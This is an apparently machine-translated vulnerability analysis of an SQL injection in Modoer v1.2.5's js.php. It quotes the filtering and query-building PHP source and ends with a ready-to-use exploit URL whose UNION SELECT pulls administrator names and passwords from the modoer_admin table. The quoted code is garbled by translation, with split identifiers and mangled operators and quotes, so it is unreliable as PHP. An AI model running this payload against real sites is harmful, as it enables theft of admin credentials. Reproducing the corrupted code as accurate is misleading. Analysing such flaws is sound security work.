Modoer v1.2.5 js. php injection vulnerability & amp; Analysis

Author: my5t3ry

A few days ago, I saw fjhgx sending a Modoer injection vulnerability in the forum. I was bored and ran the code. Let's take a look at it.

First, we can see line 76-94 of common. inc. php: preview the source code and print the information about 01 $ pattern_arr = $ replace_arr = array ();

02 if (! Defined (IN_ADMIN )){

03 $ pattern_arr = array ("/union/I", "/select/I", "/update/I", "/outfile/I ", "/or/I ");

04 $ replace_arr = array (& nbsp; union & nbsp;, & nbsp; select & nbsp;, & nbsp; update & nbsp ;,

05 & nbsp; outfile & nbsp;, & nbsp; or & nbsp ;);

06 $ _ POST = strip_ SQL ($ _ POST );

07 $ _ GET = strip_ SQL ($ _ GET );

08 $ _ COOKIE = strip_ SQL ($ _ COOKIE );

09 unset ($ pattern_arr, $ replace_arr );

10}

11

12 define (MAGIC_QUOTES_GPC, get_magic_quotes_gpc ());

13 if (! MAGIC_QUOTES_GPC ){

14 $ _ POST = add_slashes ($ _ POST );

15 $ _ GET = add_slashes ($ _ GET );

16 $ _ COOKIE = add_slashes ($ _ COOKIE );

17 $ _ FILES & $ _ FILES = add_slashes ($ _ FILES );

18}

19 if (! Empty ($ _ POST) extract ($ _ POST, EXTR_SKIP );

20 if (! Empty ($ _ GET) extract ($ _ GET, EXTR_SKIP );
When register_globals = off, this code will also register the variables for us and continue to see the strip_ SQL and add_slashes functions: preview the source code to print the 01 function strip_ SQL ($ string ){

02 global $ pattern_arr, $ replace_arr;

03 return is_array ($ string )? Array_map (strip_ SQL, $ string): preg_replace ($ pattern_arr, $ replace_arr, $ string );

04}

05

06 function add_slashes ($ string ){

07 if (is_array ($ string ))

08 foreach ($ string as $ key => $ val) $ string [$ key] = add_slashes ($ val );

09 else

10 $ string = is_string ($ string )? Addslashes ($ string): $ string;

11 return $ string;

12}
View js. php 63-109 line preview source code print about 01} else {

02

03 if ($ jssort! = Shop & $ jssort! = Review ){

04 exit ("document. write (" undefined call type. ");");

05}

06

07 $ sort = $ jssort = shop? (Isset ($ sort) & $ sort> 0 & $ sort <= 3? $ Sort: 0): (isset ($ sort) & $ sort> 0 & $ sort <= 3? $ Sort: 0 );

08 $ num = isset ($ num) & intval (trim ($ num)> = 1? Intval (trim ($ num): 10;

09 $ intercept = isset ($ intercept) & $ intercept> 0? Intval ($ intercept): 0;

10 $ openwindow = isset ($ openwindow) & $ openwindow> 0? 1: 0;

11 $ pcdname = isset ($ pcdname) & $ pcdname> 0? 1: 0;

12

13 if (! $ Sort ){

14 exit ("document. write (" no display type is selected. ");");

15}

16

17 $ cachename = js _. md5 ($ jssort. $ panels. $ sort. $ num );

18 $ cachefile = MUDDER_CACHEDIR.cache _. $ cachename.. php;

19

20 if ((@! Include ($ cachefile) | $ timestamp-$ _ createtime_js> $ cachelife ){

21

22 $ panels = $ panels? Explode (_, $ panels ):;

23 if ($ panels & is_array ($ panels) foreach ($ panels as $ panel ){

24 $ where. = ($ where? "OR": ""). "classcode like {$ panel }__";

25}

26 if ($ jssort = shop ){

27 $ select = "sid AS shopid, shopname, subname, classcode, reviews ";

28 $ from = "{$ dbpre} shops ";

29 $ where = "status = 1". ($ where? AND. $ where:); // $ where variable not initialized

30} else {

31 $ select = "a. rid as reviewid, a. content, B. shopname, B. subname, B. classcode, B. reviews ";

32 $ from = "{$ dbpre} reviews a left join {$ dbpre} shops B ON (a. shopid = B. sid )";

33 $ where = "a. status = 1 AND B. status = 1". ($ where? AND. $ where :);

34}

35 if ($ sort = 1 ){

36 $ orderby = $ jssort = shop? "Reviews DESC": "a. posttime DESC ";

37} elseif ($ sort = 2 ){

38 $ orderby = $ jssort = shop? "Sumreview DESC": "a. flower DESC ";

39} elseif ($ sort = 3 ){

40 $ orderby = $ jssort = shop? "Addtime DESC": "a. respond DESC ";

41}

42

43 $ datalist = array ();

44 $ query = $ db-> query ("SELECT $ select FROM $ from WHERE $ where order by $ orderby LIMIT $ num ");

45 while ($ result = $ db-> fetch_array ($ query )){

46 $ datalist [] = $ result;

47}
$ Where in the Code is not initialized, resulting in a vulnerability.

Exp: js. php? Sort = 1 & jssort = shop & where = % 201 = 2% 20/**/union/**/select/**/1, adminname, password, 4, 5/**/from/**/modoer_admin % 23